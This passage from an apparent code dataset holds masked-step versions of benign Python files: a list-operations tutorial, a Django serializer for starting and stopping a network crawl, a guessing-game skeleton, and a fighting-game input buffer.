print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print('=== remove_pop_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e')))\n print(l)\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\n<mask token>\n",
"step-4": "def init_list():\n print('=== init_list ===')\n l = list()\n print(l)\n l2 = []\n print(l2)\n l3 = list((1, 2))\n print(l3)\n l4 = [1, 2]\n print(l4)\n\n\ndef insert_append_and_extend_list():\n print('=== insert_append_and_extend_list ===')\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print('=== remove_pop_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e')))\n print(l)\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n\n\ndef get_len_count_index_list():\n print('=== get_len_count_index_list ===')\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n\n\ndef sort_reverse_list():\n print('=== sort_reverse_list ===')\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort())\n print(l)\n l.sort(cmp=lambda x, y: -cmp(x, y))\n print(l)\n print(l.reverse())\n print(l)\n print(list(reversed(l)))\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print('=== sort_list ===')\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print('=== list_index ===')\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print('=== list_slice ===')\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l)\n\n\ndef list_slice_with_step():\n print('=== list_slice_with_step ===')\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print('=== list_comprehension ===')\n l = [(i * i) for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print('=== test_insert_when_traversing ===')\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n\n\ndef main():\n list_slice()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# coding: utf-8\n\n\ndef init_list():\n print(\"=== init_list ===\")\n l = list()\n print(l)\n l2 = []\n print(l2)\n l3 = list((1, 2))\n print(l3)\n l4 = [1, 2]\n print(l4)\n\n\ndef insert_append_and_extend_list():\n print(\"=== insert_append_and_extend_list ===\")\n l = ['e', 'h']\n l.insert(-1, 'g')\n print(l)\n l.insert(1, 'f')\n print(l)\n l.insert(0, 'd')\n print(l)\n l.insert(10, 'i')\n print(l)\n l.append('l')\n print(l)\n l.extend(['m', 'n'])\n print(l)\n l[0:0] = ['b', 'c']\n print(l)\n l = ['a'] + l\n print(l)\n\n\ndef remove_pop_list():\n print(\"=== remove_pop_list ===\")\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l)\n print('l.remove: {}'.format(l.remove('e'))) # 只删除第一次出现的,没有返回\n print(l)\n # l.remove('h') # 删除不存在的会导致 ValueError\n if 'h' in l:\n l.remove('h')\n l.pop()\n print(l)\n l.pop(1)\n print('l.pop: {}'.format(l.pop(1)))\n print(l)\n # l.pop(10) # IndexError: pop index out of range\n\n\ndef get_len_count_index_list():\n print(\"=== get_len_count_index_list ===\")\n l = ['a', 'b', 'c', 'd', 'e', 'e']\n print(l[0])\n # l[10] = 'z' # IndexError: list index out of range\n # print(l[10]) # IndexError: list index out of range\n # print(l.get(10)) # 'list' object has no attribute 'get'\n print('len: {}'.format(len(l)))\n print('count d: {}'.format(l.count('d')))\n print('count e: {}'.format(l.count('e')))\n print('count f: {}'.format(l.count('f')))\n print('index d: {}'.format(l.index('d')))\n print('index e: {}'.format(l.index('e')))\n # print('index f: {}'.format(l.index('f'))) # ValueError: 'f' is not in list\n\n\ndef sort_reverse_list():\n print(\"=== sort_reverse_list ===\")\n l = ['e', 'b', 'c', 'a', 'f', 'd']\n print(l)\n print(l.sort()) # return None\n print(l)\n l.sort(cmp=lambda x, y: -(cmp(x, y)))\n print(l)\n print(l.reverse()) # return None\n print(l)\n print(list(reversed(l))) # return a reversed iterator\n print(l)\n\n\ndef _sort_func(x):\n return x[0] + x[1]\n\n\ndef sort_list():\n print(\"=== sort_list ===\")\n l = [(1, 2), (3, 1), (2, 3)]\n print(sorted(l, key=lambda x: x[1]))\n print(sorted(l, key=lambda x: x[0]))\n print(sorted(l, key=_sort_func))\n\n\ndef list_index():\n print(\"=== list_index ===\")\n l = ['a', 'b', 'c']\n print(l.index('a'))\n\n\ndef list_slice():\n print(\"=== list_slice ===\")\n l = [1, 2, 3]\n print(l[:1])\n print(l[:5])\n print(l[-1:])\n print(l[-5:])\n print(l[:-1])\n print(l[10:20])\n\n ls = l[:1]\n ls[0] = 2\n print(ls)\n print(l) # 改变 ls 不会改变 l\n\n\ndef list_slice_with_step():\n print(\"=== list_slice_with_step ===\")\n l = list(range(20))\n print(l[::3])\n print(l[1::3])\n print(l[2::3])\n print(l[::-1])\n l[::3] = [0, 0, 0, 0, 0, 0, 0]\n print(l)\n del l[::3]\n print(l)\n\n\ndef list_comprehension():\n print(\"=== list_comprehension ===\")\n # 列表推导式\n l = [i * i for i in range(3)]\n print(l)\n\n\ndef test_insert_when_traversing():\n print(\"=== test_insert_when_traversing ===\")\n l = [3, 4]\n for i in l:\n l.insert(0, -i)\n print(i)\n # 会停不下来\n\n\ndef main():\n # init_list()\n # insert_append_and_extend_list()\n # remove_pop_list()\n # get_len_count_index_list()\n # sort_reverse_list()\n # sort_list()\n # list_index()\n list_slice()\n # list_slice_with_step()\n # list_comprehension()\n # test_insert_when_traversing()\n\n\nif __name__ == '__main__':\n main()\n\n# https://www.tutorialspoint.com/python/python_lists.htm\n# https://stackoverflow.com/a/9028088/3936457\n# https://stackoverflow.com/questions/8785554/how-do-i-insert-a-list-at-the-front-of-another-list\n",
"step-ids": [
10,
11,
12,
14,
15
]
}
|
[
10,
11,
12,
14,
15
] |
from django.core.cache import cache
from rest_framework import serializers
from thenewboston.constants.crawl import (
CRAWL_COMMAND_START,
CRAWL_COMMAND_STOP,
CRAWL_STATUS_CRAWLING,
CRAWL_STATUS_NOT_CRAWLING,
CRAWL_STATUS_STOP_REQUESTED
)
from v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS
from v1.tasks.crawl import start_crawl
class CrawlSerializer(serializers.Serializer):
crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START, CRAWL_COMMAND_STOP])
default_error_messages = {
**serializers.Serializer.default_error_messages,
'cant_start_crawl': 'Can not start new crawl when already crawling',
'cant_stop_crawl': 'Can not stop crawl if not crawling',
}
def create(self, validated_data):
"""Start a network crawl"""
crawl = validated_data['crawl']
if crawl == CRAWL_COMMAND_START:
cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)
start_crawl.delay()
if crawl == CRAWL_COMMAND_STOP:
cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)
return validated_data
def is_valid(self, raise_exception=False):
with cache.lock(CRAWL_CACHE_LOCK_KEY):
return super().is_valid(raise_exception)
def update(self, instance, validated_data):
raise RuntimeError('Method unavailable')
def validate_crawl(self, crawl):
"""
Validate the correct crawl command is given
- can not start new crawl when already crawling
- can not stop crawl if not crawling
"""
crawl_status = cache.get(CRAWL_STATUS)
if crawl == CRAWL_COMMAND_START and crawl_status in (CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):
raise serializers.ValidationError(self.error_messages['cant_start_crawl'])
if crawl == CRAWL_COMMAND_STOP and crawl_status in (CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):
raise serializers.ValidationError(self.error_messages['cant_stop_crawl'])
return crawl
|
normal
|
{
"blob_id": "cb32aa6a1c42e7bb417999f3f6f74ec22209c5a0",
"index": 1230,
"step-1": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n <mask token>\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-2": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-3": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP])\n default_error_messages = {**serializers.Serializer.\n default_error_messages, 'cant_start_crawl':\n 'Can not start new crawl when already crawling', 'cant_stop_crawl':\n 'Can not stop crawl if not crawling'}\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-4": "from django.core.cache import cache\nfrom rest_framework import serializers\nfrom thenewboston.constants.crawl import CRAWL_COMMAND_START, CRAWL_COMMAND_STOP, CRAWL_STATUS_CRAWLING, CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED\nfrom v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS\nfrom v1.tasks.crawl import start_crawl\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP])\n default_error_messages = {**serializers.Serializer.\n default_error_messages, 'cant_start_crawl':\n 'Can not start new crawl when already crawling', 'cant_stop_crawl':\n 'Can not stop crawl if not crawling'}\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-5": "from django.core.cache import cache\nfrom rest_framework import serializers\nfrom thenewboston.constants.crawl import (\n CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP,\n CRAWL_STATUS_CRAWLING,\n CRAWL_STATUS_NOT_CRAWLING,\n CRAWL_STATUS_STOP_REQUESTED\n)\n\nfrom v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS\nfrom v1.tasks.crawl import start_crawl\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START, CRAWL_COMMAND_STOP])\n\n default_error_messages = {\n **serializers.Serializer.default_error_messages,\n 'cant_start_crawl': 'Can not start new crawl when already crawling',\n 'cant_stop_crawl': 'Can not stop crawl if not crawling',\n }\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n\n if crawl == CRAWL_COMMAND_START and crawl_status in (CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages['cant_start_crawl'])\n\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages['cant_stop_crawl'])\n\n return crawl\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
print ("Welcome to the Guessing Game 2.0\n")
print ("1 = Easy\t(1 - 10)")
print ("2 = Medium\t(1 - 50)")
print ("3 = Hard\t(1 - 100)")
# Player: Input user's choice
# while: Check if user enters 1 or 2 or 3
# CPU: Generate a random number
# Player: Input user's number
# Variable: Add a variable 'attempt' and assign 1
# while: Check user number is wrong
# Conditional Statement: Check if user number is whether higher or lower.
# Player: Input user's number
# Variable: Add 1 to 'attempt'
# Result with attempts
# Player: Input user's choice
# Print: Thank you for playing the game.
|
normal
|
{
"blob_id": "7f2489aa440441568af153b231420aa2736716ca",
"index": 4052,
"step-1": "<mask token>\n",
"step-2": "print('Welcome to the Guessing Game 2.0\\n')\nprint('1 = Easy\\t(1 - 10)')\nprint('2 = Medium\\t(1 - 50)')\nprint('3 = Hard\\t(1 - 100)')\n",
"step-3": "print (\"Welcome to the Guessing Game 2.0\\n\")\n\nprint (\"1 = Easy\\t(1 - 10)\")\nprint (\"2 = Medium\\t(1 - 50)\")\nprint (\"3 = Hard\\t(1 - 100)\")\n\n# Player: Input user's choice\n\n\n# while: Check if user enters 1 or 2 or 3\n\n\n # CPU: Generate a random number\n\n\n # Player: Input user's number\n\n\n # Variable: Add a variable 'attempt' and assign 1\n\n\n # while: Check user number is wrong\n\n\n # Conditional Statement: Check if user number is whether higher or lower.\n\n\n # Player: Input user's number\n\n\n # Variable: Add 1 to 'attempt'\n\n\n # Result with attempts\n\n\n # Player: Input user's choice\n\n\n# Print: Thank you for playing the game.",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
<|reserved_special_token_0|>
def __str__(self):
return f'{self._inputs}'
<|reserved_special_token_0|>
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
<|reserved_special_token_0|>
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
from enum import Enum
from roll.input import Input
from roll.network import Server, Client
from assets.game_projects.fighter.src.game_properties import GameProperties
from assets.game_projects.fighter.src.network_message import NetworkMessage
class InputBuffer:
"""
Responsible for collecting game input from both players. The game state will pull data from here if needed.
Network messages will also update the input buffer when receiving data from the opposite player
"""
class Value(Enum):
LEFT = "l"
RIGHT = "r"
UP = "u"
DOWN = "d"
WEAK_PUNCH = "wp"
def __init__(
self,
left_action_name: str,
right_action_name: str,
weak_punch_action_name: str,
frame_limit=12,
):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f"{self._inputs}"
def __repr__(self):
return f"{self._inputs}"
@property
def values(self) -> list:
return self._inputs.values()
def add_input(self, input, frame: int) -> None:
if frame in self._inputs:
self._inputs[frame].append(input.value)
else:
self._inputs[frame] = [input.value]
def get_inputs(self) -> dict:
return self._inputs
def get_frame_inputs(self, frame: int) -> list:
return self._inputs.get(frame, [])
def is_empty(self) -> bool:
